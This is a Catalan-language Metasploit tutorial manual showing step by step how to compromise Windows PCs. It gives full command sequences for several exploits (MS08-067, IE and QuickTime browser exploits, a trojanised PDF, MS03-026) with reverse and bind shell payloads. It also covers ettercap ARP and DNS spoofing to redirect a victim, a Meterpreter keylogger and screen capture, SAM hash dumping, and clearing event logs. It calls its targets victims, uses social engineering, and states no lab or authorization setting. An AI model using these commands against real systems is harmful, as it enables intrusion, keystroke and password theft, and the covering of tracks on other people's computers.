1. Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware
(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/
Metasploit Framework: Mini How-to
Aquest mini how-to us mostra amb exemples com s'utilitzarien alguns exploits de Metasploit
per explotar vulnerabilitats de Windows.
Potser us semblaran poca cosa ja que m'estic iniciant en això i vull que aquest post serveixi per
seguir aprenent d'aquest tema i aporteu els vostres coneixements.
Començar dient que Metasploit Framework es pot utilitzar tant en Linux com en Windows. Jo
utilitzo Backtrack ja que ho inclou, a més d'altres eines que poden combinar-se amb
Metasploit.
Link de descàrrega: http://www.metasploit.com/download/
Abans de llançar qualsevol exploit, és recomanable que coneguem les ip's connectades a la
nostra xarxa, per saber-ho fem:
Linux:
sudo nmap -sS -O 192.168.1.0-255
(Canvieu 192.168.1.0 per la vostra IP 0 de la vostra lan)
-sS --> Escanegem de forma silenciosa
-O --> Perquè ens mostri el Sistema Operatiu
Windows:
net view
A part d'això aconsello també l'ús de l'eina Colasoft MAC Scanner per l'escaneig de PC's
connectats a la xarxa.
Executem el msfconsole de Metasploit Framework.
Una vegada que coneixem les ip's i els seus respectius Sistemes Operatius, per utilitzar el
primer exploit anem a intentar localitzar algun Windows XP.
2. Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware
(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/
(Recomanable que per veure si el pc està connectat fem ping a la seva IP).
Primer exploit (netapi)
use windows/smb/ms08_067_netapi
set RHOST (ip equip remot)
set payload windows/vncinject/reverse_tcp
set LHOST (ip del nostre equip)
exploit
Se'ns obrirà una pantalla remota amb el pc víctima.
Com hem vist anteriorment, només serveix per Windows XP, vegem ara un que es pot utilitzar
en qualsevol Sistema Windows aprofitant una vulnerabilitat en Internet Explorer (com és
natural, la víctima ha d'utilitzar com a navegador l'Internet Explorer).
Segon exploit
use exploit/windows/browser/ms10_022_ie_vbscript_winhlp32
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (la nostra IP)
set LPORT 4442
exploit
Sortirà una URL en la qual la víctima ha d'entrar, esperem a que entri.
sessions -i 1
run vnc
Se'ns obrirà una pantalla remota amb el pc víctima.
3. Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware
(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/
Tercer exploit (Semblat a l'anterior)
use exploit/windows/browser/ms11_003_ie_css_import
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (la nostra IP)
exploit
Sortirà una URL en la qual la víctima ha d'entrar, esperem que entri.
sessions -i 1
run vnc
Se'ns obrirà una pantalla remota amb el pc víctima.
Suposem que no tenim possibilitat de passar-li la URL al pc víctima, per a això podem utilitzar:
ettercap de la següent manera:
ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /(ip víctima)/ //
D'aquesta manera quan s'obri l'explorer anirà a aquesta URL directament. Per a això hem de
modificar abans l'arxiu etter.dns. Per a això procedim de la següent manera:
sudo gedit /usr/share/ettercap/etter.dns
Busquem la següent linea:
################################
#
# redirect it to www.linux.org
#
4. Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware
(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/
I agreguem el següent:
* A la nostra_ip
El * perquè quan entri a qualsevol URL es redireccioni a la URL Infectada.
Cambra exploit (a través de pdf)
use exploit/windows/fileformat/adobe_pdf_embedded_exe
set FILENAME arxiu.pdf (arxiu que anem a crear, posem el nom que vulguem)
set INFILENAME arxiu.pdf (arxiu net, li passem el nom del nostre pdf)
set OUTPUTPATH /root/
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (la nostra ip)
set LPORT 4455
set id 0
exploit
clear
back
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (la nostra IP)
set LPORT 4455
set id 0
exploit
Li passem el pdf a la víctima i en obrir-lo ens donarà accés al seu PC.
Cinquè exploit (vulnerabilitat de Quicktime)
use exploit/windows/browser/apple_quicktime_marshaled_punk (Exploit que anem a utilitzar)
set SRVHOST 192.168.0.162 (IP local on va a muntar el servei)
5. Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware
(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/
set SRVPORT 80 (Port local del servei)
set URIPATH jocs (Uri del servei)
set payload windows/shell/reverse_tcp (Payload que anem a utilitzar)
set LHOST 192.168.0.162 (IP on es connectarà la víctima)
set LPORT 5050 (Port local d'escolta)
exploit (Executem el exploit)
Només faltaria que la nostra víctima es connectés al nostre servidor (192.168.0.162/jocs),
aconseguint això usant una mica d'enginyeria social, perquè Metasploit ens informi que s'ha
creat una nova sessió. Usem el següent comandament (sessions -i x) on x és el nombre de
sessió creat per connectar amb la víctima i se'ns retorni una shell reverse de la mateixa.
D'aquesta manera aconseguirem control total sobre el seu PC. Aquest mètode serveix per a
totes les versions de Windows que tinguin instal·lat Quicktime.
Sisè exploit (keylogger)
use windows/smb/ms08_067_netapi
set RHOST (ip equip remot)
set PAYLOAD windows/meterpreter/bind_tcp
exploit
Una vegada llançat el exploit ja estarem dins del PC víctima, vegem els processos que té
corrent:
ps
Ara migrarem el processo explorer.exe. Usant el comando següent:
migrate (nº del procés).
Iniciem el Keylogger
keyscan_start
6. Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware
(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/
Amb l'ajuda del comandament keyscan_dump, veurem les tecles pressionades en l'equip
víctima.
keyscan_dump
També tenim la possibilitat de veure un ScreenShot de la pantalla víctima.
use espia
screenshot /Imag.bmp
Finalitzem el keylogger:
keyscan_stop
Setè exploit (Intrusió en Windows Server 2000)
search exploit ms03_026_dcom
use exploit /windows/dcerpc/ms03_026_dcom
show targets
show payloads
set payload generic/shell_bind_tcp
show options
set RHOST [IP de la víctima]
exploit
Una vegada explotat el sistema podem fer moltes coses, heus aquí un llistat de comandos que
podem utilitzar:
background -> Envia al segon pla la sesion activa.
exit -> Acaba la sessió oberta de Meterpreter.
help -> Mostra l'ajuda
7. Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware
(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/
irb -> Ens llança a l'intèrpret de Ruby (irb).
migrate -> Migra d'un procés a un altre.
quit -> Acaba la sessió oberta de Meterpreter.
run -> Executa un script de Meterpreter. Pressionant dues vegades TAB veurem els
disponibles.
use -> Carrega una o mes extensions de Meterpreter. Pressionant dues vegades TAB veurem
els disponibles.
cat -> Mostra el contingut d'un arxiu de text.
cd -> Canvia a un directori.
del -> Elimina un arxiu específic.
download -> Descarrega un arxiu o directori a l'equip local.
editc -> Edita un arxiu.
getlwd -> Mostra el directori local en el qual estem treballant.
getwd -> Mostra el directori remot en el qual estem treballant.
lcd -> Canvia a un directori local.
lpwd -> Mostra el directori local en el qual estem treballant.
ls -> Mostra els arxius continguts en un directori.
mkdir -> Crea un directori.
pwd -> Mostra el directori remot en el qual estem treballant.
rm -> Elimina un arxiu específic.
rmdir -> Elimina un directori específic.
upload -> Puja un arxiu o directori a l'equip remot.
ipconfig -> Mostra les interfícies de xarxa.
clearev -> Elimina els logs emmagatzemats en l'aplicació “Visor de Successos”
execute -> Executa un comandament.
getpid -> Mostra la identificació del procés en el qual estem.
getuid -> Mostra l'usuari en el qual estem actualment .
kill -> Acaba un procés.
8. Més manuals a: http://www.exabyteinformatica.com/manuales-y-apuntes-freeware
(C) Roger Casadejús Pérez | http://www.exabyteinformatica.com/tienda/
ps -> Mostra els processos en execució.
reboot -> Reinicia l'equip remot.
reg -> Modifica i interactua amb el registre remot.
shell -> Ens llança a una consola en l'equip remot.
shutdown -> Apaga l'equip remot.
sysinfo -> Ens mostra informació sobre l'equip remot.
keyscan_dump -> Mostra les pulsacions de tecles gravades.
keyscan_start -> Comença a capturar pulsacions de tecles.
keyscan_stop -> Atura la captura de pulsacions de tecles.
hashdump -> Mostra el contingut de la base de dades SAM de Windows (Conté els usuaris i
passwords encriptades).
De tant en tant reviso aquesta pàgina per aprendre una mica més sobre aquest ampli tema.
Us la recomano http://www.metasploit.com/modules/